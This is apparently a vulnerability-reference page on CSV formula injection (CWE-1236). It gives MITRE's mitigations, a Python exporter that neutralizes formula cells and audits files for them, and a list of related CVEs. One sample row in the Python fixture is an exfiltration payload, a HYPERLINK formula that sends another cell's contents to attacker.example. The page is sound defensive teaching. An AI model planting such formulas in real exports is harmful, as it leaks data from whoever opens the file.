
CWE-1236 Vulnerability Class: Improper Neutralization of Formula Elements in a CSV File

128 vulnerabilities classified as CWE-1236. AI-generated analysis (Chinese) included.

CWE-1236 is an output-neutralization weakness rather than an input-validation one: an application writes user-supplied data into a CSV export without neutralizing characters that a spreadsheet application interprets as the start of a formula. An attacker stores a value that begins with '=', '+', '-' or '@' (for example a HYPERLINK formula pointing at a server they control) in a field that is later exported. The CSV file itself is inert; the risk materializes when a victim opens it in Microsoft Excel, LibreOffice Calc or a similar program, which evaluates the cell as a formula instead of displaying it as text. Typical impacts are exfiltration of other cells' contents through a crafted hyperlink and, through legacy spreadsheet features such as DDE, execution of local commands, although current versions of Excel warn the user before either happens. Wrapping the field in double quotes is not a defence, because the spreadsheet removes CSV quoting before it parses the cell. The mitigation belongs in the serializer: for every field that begins with a formula character, either prepend a single apostrophe so the content is stored as literal text, or strip the leading character, and apply that rule to every export path (user lists, reports, form submissions), not only the one where the problem was first reported.

MITRE CWE Description
The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.
Common Consequences (1)
Scope: Confidentiality. Impact: Read Application Data; Execute Unauthorized Code or Commands.
Attackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content.
Mitigations (3)
Phase: Implementation. When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).
Effectiveness: Moderate
Phase: Implementation. If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula.
Effectiveness: Moderate
Phase: Architecture and Design. Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.
Effectiveness: Limited
Examples (1)
Hyperlinks or other commands can be executed when a cell begins with the formula identifier, '='.
Attack (cell content as written to the CSV):
=HYPERLINK(link_location, [friendly_name])
Good (the leading '=' stripped, so the spreadsheet stores the cell as text):
HYPERLINK(link_location, [friendly_name])
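The mitigations and the example above come together in the exporter itself. The following Python is an added example written for this page, not code from MITRE or from any product listed below; the field names, the attacker.example URL and the sample rows are constructed, and leaving plain signed numbers such as -15.5 untouched is a design choice of this example rather than part of the CWE guidance. It shows the vulnerable export, the hardened export in both the apostrophe-prefix and the strip form, and an audit function that flags evaluable cells in an existing CSV.

```python
"""Added example for CWE-1236: neutralizing formula triggers in a CSV export.

Constructed demo, not code from MITRE or from any product on this page.
"""
import csv
import io
import re

# Leading characters a spreadsheet treats as the start of a formula: '=', '+', '-'
# and '@' as listed in the CWE mitigation. Tab and carriage return are included as
# an assumption of this example, because importers may discard them and then see
# the formula character that follows.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Design choice of this example: a field that is a plain signed number (-15.5, +3)
# also starts with a trigger but must remain numeric, so it is left untouched.
_PLAIN_NUMBER = re.compile(r"^[+-]?(\d+\.?\d*|\.\d+)$")


def is_formula_like(text: str) -> bool:
    """True if a spreadsheet would evaluate this cell instead of storing it as text."""
    return bool(text) and text[0] in FORMULA_TRIGGERS and not _PLAIN_NUMBER.match(text)


def neutralize_cell(value, mode: str = "prefix") -> str:
    """Neutralize one cell before it is serialized.

    mode="prefix": prepend an apostrophe so the cell is stored as literal text
                   (the CWE's second mitigation; the apostrophe stays in the data).
    mode="strip":  drop the leading trigger characters, which is what the CWE
                   example does when it turns '=HYPERLINK(...)' into 'HYPERLINK(...)'.
    """
    if value is None:
        return ""
    text = str(value)
    if not is_formula_like(text):
        return text
    if mode == "strip":
        return text.lstrip("".join(FORMULA_TRIGGERS))
    return "'" + text


def export_csv(rows, fieldnames, neutralize: bool = True, mode: str = "prefix") -> str:
    """Serialize dict rows to CSV text.

    neutralize=False reproduces the vulnerable export: the csv module quotes fields
    and doubles embedded quotes correctly, but quoting alone does not stop a
    spreadsheet from evaluating a cell whose content begins with '='.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        cells = {}
        for key in fieldnames:
            raw = row.get(key)
            if neutralize:
                cells[key] = neutralize_cell(raw, mode)
            else:
                cells[key] = "" if raw is None else str(raw)
        writer.writerow(cells)
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Audit check for an existing export: parse the CSV and return
    (data_row, column, value) for every cell a spreadsheet would evaluate.
    An empty list means the file is neutralized."""
    hits = []
    for r, record in enumerate(csv.reader(io.StringIO(csv_text))):
        if r == 0:
            continue  # header row
        for c, cell in enumerate(record):
            if is_formula_like(cell):
                hits.append((r, c, cell))
    return hits


FIELDS = ["display_name", "email", "balance", "note"]
# Constructed sample rows: one honest user and two attacker-controlled profiles.
SAMPLE_ROWS = [
    {"display_name": "Smith, Jane", "email": "jane@example.com",
     "balance": -15.5, "note": "regular"},
    {"display_name": '=HYPERLINK("https://attacker.example/?d="&B2,"open")',
     "email": "mallory@example.com", "balance": 0, "note": "@SUM(1+1)"},
    {"display_name": "\t=1+1", "email": "eve@example.com",
     "balance": 3, "note": None},
]

if __name__ == "__main__":
    naive = export_csv(SAMPLE_ROWS, FIELDS, neutralize=False)
    safe = export_csv(SAMPLE_ROWS, FIELDS)
    print("vulnerable export flags:", find_formula_cells(naive))
    print("neutralized export flags:", find_formula_cells(safe))
    print(safe)
```

The apostrophe stays in the field, so a consumer that is not a spreadsheet (a downstream import job, for instance) will see it; that lossiness is why MITRE rates the prefix only Moderate, and why the numeric exemption above exists. Quoting or HTML-escaping the value does nothing here, since the spreadsheet strips CSV quoting before it parses the cell. find_formula_cells doubles as a regression test to run against every export endpoint, which matters because several of the CVEs below are in plugins whose sole function is exporting data.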
| CVE ID | Title | Product | CVSS | Severity | Published |
|---|---|---|---|---|---|
| CVE-2023-25611 | Fortinet FortiAnalyzer security vulnerability | FortiAnalyzer | 4.0 | Medium | 2023-03-07 |
| CVE-2022-35281 | IBM Maximo Application Suite command injection | Maximo Asset Management | 5.5 | Medium | 2023-01-06 |
| CVE-2022-4034 | Appointment Hour Booking <= 1.3.72 - CSV Injection | Appointment Hour Booking – Booking Calendar | 5.8 | Medium | 2022-11-29 |
| CVE-2022-41675 | TEAM JOHNLONG SOFTWARE CO., LTD. MAILD Mail Server - Formula Injection | MAILD Mail Server | 8.0 | High | 2022-11-29 |
| CVE-2022-3574 | WPForms Pro < 1.7.7 - CSV Injection | WPForms Pro | 9.8 | - | 2022-11-14 |
| CVE-2022-27858 | WordPress Activity Log plugin <= 2.8.3 - CSV Injection vulnerability | Activity Log (WordPress plugin) | 7.4 | High | 2022-11-08 |
| CVE-2022-3463 | FluentForm < 4.3.13 - CSV Injection | Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms | 8.8 | - | 2022-11-07 |
| CVE-2022-3558 | Import and export users and customers < 1.20.5 - Subscriber+ CSV Injection | Import and export users and customers | 8.0 | - | 2022-11-07 |
| CVE-2022-40294 | CSV Injection in PHP Point of Sale version 19.0, by PHP Point of Sale, LLC | PHP Point of Sale | 8.8 | - | 2022-10-31 |
| CVE-2022-3393 | Post to CSV by BestWebSoft <= 1.4.0 - Author+ CSV Injection | Post to CSV by BestWebSoft | 8.8 | - | 2022-10-25 |
| CVE-2022-2798 | Affiliates Manager < 2.9.14 - Affiliate CSV Injection | Affiliates Manager | 8.0 | - | 2022-09-16 |
| CVE-2022-1194 | Mobile Events Manager < 1.4.8 - Admin+ CSV Injection | Mobile Events Manager | 8.0 | - | 2022-09-16 |
| CVE-2022-3026 | WP Users Exporter <= 1.4.2 - CSV Injection | WP Users Exporter | 6.5 | Medium | 2022-09-06 |
| CVE-2022-2240 | Request a Quote <= 2.3.7 - CSV Injection | Request a Quote | 8.8 | - | 2022-07-25 |
| CVE-2022-1539 | Exports and Reports < 0.9.2 - Contributor+ CSV Injection | Exports and Reports | 8.8 | - | 2022-07-25 |
| CVE-2022-2112 | Improper Neutralization of Formula Elements in a CSV File in inventree/inventree | inventree/inventree | 8.8 | - | 2022-06-17 |
| CVE-2022-1202 | WP-CRM <= 1.2.1 - CSV Injection | WP-CRM – Customer Relations Management for WordPress | 7.8 | - | 2022-06-13 |
| CVE-2022-2027 | Improper Neutralization of Formula Elements in a CSV File in kromitgmbh/titra | kromitgmbh/titra | 8.8 | - | 2022-06-08 |
| CVE-2022-26867 | Dell EMC PowerStore security vulnerability | PowerStore | 5.9 | Medium | 2022-06-02 |
| CVE-2022-1544 | Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in luyadev/yii-helpers | luyadev/yii-helpers | 7.8 | - | 2022-05-01 |
| CVE-2021-23286 | Security issues in Eaton Intelligent Power Manager Infrastructure | Intelligent Power Manager Infrastructure (IPM Infrastructure) | 5.7 | Medium | 2022-04-18 |
| CVE-2022-0142 | Visual Form Builder < 3.0.6 - CSV Injection | Visual Form Builder | 9.8 | - | 2022-04-12 |
| CVE-2022-24770 | Improper Neutralization of Formula Elements in a CSV File in Gradio Flagging | gradio | 8.8 | High | 2022-03-17 |
| CVE-2022-22689 | CA Harvest Software Change Manager security vulnerability | CA Harvest Software Change Manager | 8.8 | - | 2022-02-04 |
| CVE-2022-22121 | NocoDB - CSV Injection in User Management | nocodb | 8.0 | High | 2022-01-10 |
| CVE-2021-41270 | CSV Injection in Symfony | symfony | 6.5 | Medium | 2021-11-24 |
| CVE-2021-38424 | Delta Electronics DIALink | DIALink | 5.9 | Medium | 2021-11-03 |
| CVE-2020-36503 | Connections Business Directory < 9.7 - Admin+ CSV Injection | Connections Business Directory | 8.0 | - | 2021-11-01 |
| CVE-2021-38180 | SAP Business One security vulnerability | SAP Business One | 8.8 | - | 2021-10-12 |
| CVE-2021-25960 | SuiteCRM - CSV Injection in Accounts Module | SuiteCRM | 8.0 | High | 2021-09-29 |

128 CVEs are classified as CWE-1236; the 30 entries listed above are a subset of them, and the Severity column is shown as '-' where the listing provides no rating. The CWE taxonomy describes the weakness only; review the individual CVEs for product-specific impact, in particular which export feature is affected and which user role can supply the exported data.